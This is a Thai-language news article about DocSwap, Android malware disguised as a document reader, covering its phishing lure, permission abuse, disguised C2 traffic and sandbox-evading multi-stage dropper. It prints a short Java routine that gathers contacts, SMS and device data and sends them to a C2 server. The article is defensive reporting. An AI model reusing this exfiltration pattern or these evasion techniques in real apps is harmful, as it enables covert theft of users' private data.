มัลแวร์ DocSwap ปลอมตัวเป็นแอปอ่านไฟล์เอกสาร กำลังระบาดบน Android อย่างหนัก

มัลแวร์กับ Android เรียกได้ว่าเป็นของที่คู่กันไปแล้ว และมักจะมีข่าวออกมาถึงการปรากฏของมัลแวร์ตัวใหม่ ๆ ทุกสัปดาห์ และสำหรับข่าวนี้ก็เช่นเดียวกัน

จากรายงานโดยเว็บไซต์ Cyber Security News ได้รายงานถึงการตรวจพบแคมเปญการกระจายมัลแวร์ตัวใหม่บนระบบปฏิบัติการ Android ที่มีชื่อว่า DocSwap โดยแอบอ้างตัวเองว่าเป็นแอปพลิเคชันสำหรับใช้ในการอ่านไฟล์เอกสารอย่างปลอดภัย แต่แท้จริงเป็นมัลแวร์ที่ใช้ในการขโมยข้อมูลจากเครื่องของเหยื่อ

โดยแฮกเกอร์ที่อยู่เบื้องหลังมัลแวร์ดังกล่าวนั้นจะใช้การหลอกลวงด้วยวิธีการที่เรียกว่าวิศวกรรมทางสังคม (Social Engineering) ด้วยการส่งอีเมล Phishing หรือส่งตัวเว็บไซต์ให้ โดยโฆษณาหลอกลวงว่ามีแอปพลิเคชันที่ใหม่ที่ช่วยอ่านไฟล์ที่ถูกสร้างด้วยซอฟต์แวร์ Offices แบบต่าง ๆ เช่น Doc หรือ XlS หรือไฟล์เอกสารแบบ PDF อย่างปลอดภัยได้

ทว่า พอเหยื่อทำการติดตั้งแอปพลิเคชันดังกล่าวสำเร็จ ตัวแอปพลิเคชันจะทำการร้องขอให้ผู้ใช้งานทำการอนุมัติสิทธิ์ในการเข้าถึงระบบ รวมไปถึงการเข้าถึงรายชื่อผู้ติดต่อที่ถูกบันทึกไว้บนเครื่อง (Contact List), แหล่งเก็บไฟล์ (Storage), และ ข้อความสั้น (SMS หรือ Short Message Service) หลังจากนั้นก็จะทำการติดต่อการเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) ที่มักตั้งอยู่ในแถบยุโรปและเอเชียตะวันออกเฉียงใต้ผ่านทางการสื่อสารแบบเข้ารหัสเพื่อหลบเลี่ยงการตรวจจับจากระบบรักษาความปลอดภัยบนเครื่องเพื่อรอรับคำสั่งจากทางแฮกเกอร์ต่อไป ซึ่งในการสื่อสารนั้นตัวมัลแวร์ยังได้มีการใช้ Protocol การสื่อสารเพื่อปลอมแปลงการขนส่งข้อมูลให้เหมือนกับรูปแบบการรับส่งข้อมูลของเว็บไซต์แบบ HTTPs แบบทั่วไปเพื่อหลอกลวงระบบการตรวจจับอีกด้วย โดยทางทีมวิจัยได้ระบุว่า มัลแวร์ดังกล่าวนี้ปัจจุบันกำลังระบาดอยู่ในหลายทวีปไม่ว่าจะเป็น เอเชีย, ยุโรป, และอเมริกาเหนือ ในตลอด 3 สัปดาห์ที่ผ่านมา

นอกจากนั้นแล้ว ทางทีมวิจัยยังพบว่าตัวมัลแวร์นั้นมีการนำเอาเทคนิคการตีรวนระบบรักษาความปลอดถัย (Obfuscation) เข้ามาใช้งานอีกด้วย ด้วยการหลังจากที่รันขึ้นมา ตัวแอปปลอมจะทำการโชว์ฟีเจอร์ในการอ่านไฟล์ต่าง ๆ แต่เบื้องหลังนั้นกลับเป็นการดาวน์โหลด และรันตัวมัลแวร์ (Payload) ทำให้การตรวจจับโดยระบบ และจากผู้ใช้งานงานเองนั้นทำได้ยากยิ่งขึ้น

ไม่เพียงเท่านั้น ตัวมัลแวร์ยังใช้รูปแบบการติดตั้งแบบหลายชั้น (Multi-Stage Infection) โดยตัวที่ติดตั้งตัวแรกจะทำหน้าที่เป็นมัลแวร์นกต่อ (Dropper) เพื่อใช้ในการดาวน์โหลดมัลแวร์ (Payload) อีกตัวลงมา ซึ่งตัวมัลแวร์นกต่อนี่จะมีการแฝง Payload แบบเข้ารหัสไว้ โดยจะมีการคลายไฟล์ออกมาหลังจากที่ครบเวลาในการรอ (Delay) ตามที่ตัวมัลแวร์ได้กำหนดไว้ เพื่อทำการหลบเลี่ยงการใช้เทคนิคการวิเคราะห์ด้วยการจำลองระบบการทำงานที่น่าสงสัย หรือ Sandbox Analysis โดยนักวิเคราะห์มัลแวร์ รวมไปถึงหลีกเลี่ยงการถูกสแกนด้วยเครื่องมือรักษาความปลอดภัยแบบ Dynamic Scanning Tools อีกด้วย

นอกจากนั้นแล้ว ทางทีมวิจัยยังพบว่าฟังก์ชันการทำงานของมัลแวร์ DocSwap นั้นมีการใช้ประโยชน์จาก Native Library เพื่อรันโค้ดดังต่อไปนี้อีกด้วย

private void exfiltrateData() {

    String deviceInfo = getDeviceInfo();

    String contactsList = getContacts();

    String smsData = getMessages();

    new AsyncTask() {

        @Override

        protected Void doInBackground(Void... params) {

            sendToC2Server(encryptData(deviceInfo + contactsList + smsData));

            return null;

        }

    }.execute();

}

ทางแหล่งข่าวนั้นได้แนะนำว่า ถ้าใครสงสัยว่าได้มีการติดตั้งแอปพลิเคชันอันตรายดังกล่าวลงไป ให้ทำการลบทิ้งในทันที รวมทั้งใช้เครื่องมือรักษาความปลอดภัยรุ่นล่าสุดในการสแกนเครื่องแบบเต็มรูปแบบ (Full Scan) เพื่อลบไฟล์อันตรายต่าง ๆ บนเครื่องอย่างสิ้นซาก